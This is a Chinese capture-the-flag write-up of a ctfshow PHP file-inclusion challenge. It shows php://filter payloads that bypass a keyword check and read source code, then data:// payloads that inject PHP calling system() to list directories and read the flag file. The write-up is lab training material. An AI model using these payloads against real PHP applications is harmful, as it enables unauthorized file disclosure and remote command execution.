ctfshow 36D练手赛 超超超级详解 ==_ctfshow36d练手杯

1、不知所措.jpg

这题对我这个新手来说真的是一言难尽…太吃经验了，老手肯定是分分钟解决

• 打开页面，这里的意思是变量$file必须要有test
• 首先猜测变量$file是通过$_GET['file']GET请求得到的且为?file=test
  • ??自动给我加了一个php
    
• 难道是存在一个test.php文件？尝试，输入test自动补php，index.php?file=test.php，这是一个文件包含？
  • 也确实存在，貌似是文件包含，但是它说flag不在这儿
    
• 既然是文件包含，尝试用php://filter读test.php源码（看一下）

  • poc：?file=php://filter/read=convert.base64-encode/resource=test.
    

  • 解码得

<?php
echo "flag_not_here";
?>
//....真无情
1
2
3
4

• 这个时候，还能干啥。。。。对，和题目最相关的文件除了test.php还有index.php，查看index.php源码，

  • 但$file变量中是要有test这个词眼！。。。该怎么办？
    

• 恰好，面对这种情况，小生有一点经验=￣ω￣=，细讲的话要涉及的到php://filter协议的语法

  • 正常语法是 php://filter/read(或是write)=xxxxx/resource=xxx.php，仔细看哦，对应参数值都在url中有=号相对应，且以/分割
    

  • 这是不是意味着php://filter/read=xxxx/这里可以乱写呢/resource=xxx.php ？这个协议是靠关键字匹配参数，之外的部分为啥不能乱写？

• 回到题目验证

  • /?file=php://filter/read=convert.base64-encode/test我在这里乱写了啊/resource=index.
  • =￣ω￣=
    

• base64解码得

<?php
error_reporting(0);
$file=$_GET['file'];
$file=$file.'php';
echo $file."<br />";
if(preg_match('/test/is',$file)){
	include ($file);
}else{
	echo '$file must has test';
}
?>
1
2
3
4
5
6
7
8
9
10
11

• 确定了是include($file)，使用data://text/plain伪协议向$file写入PHP代码，来进行命令执行！

• /?file=data://test/plain,<?php eval(system('ls'));?>//test
  

• ?file=data://test/plain,<?php eval(system('ls /'));?>//test
  

• ?file=data://test/plain,<?php eval(system('cat /FFFFFFFL@GGGG'));?>//test
  

2、easyshell

。。。（待更）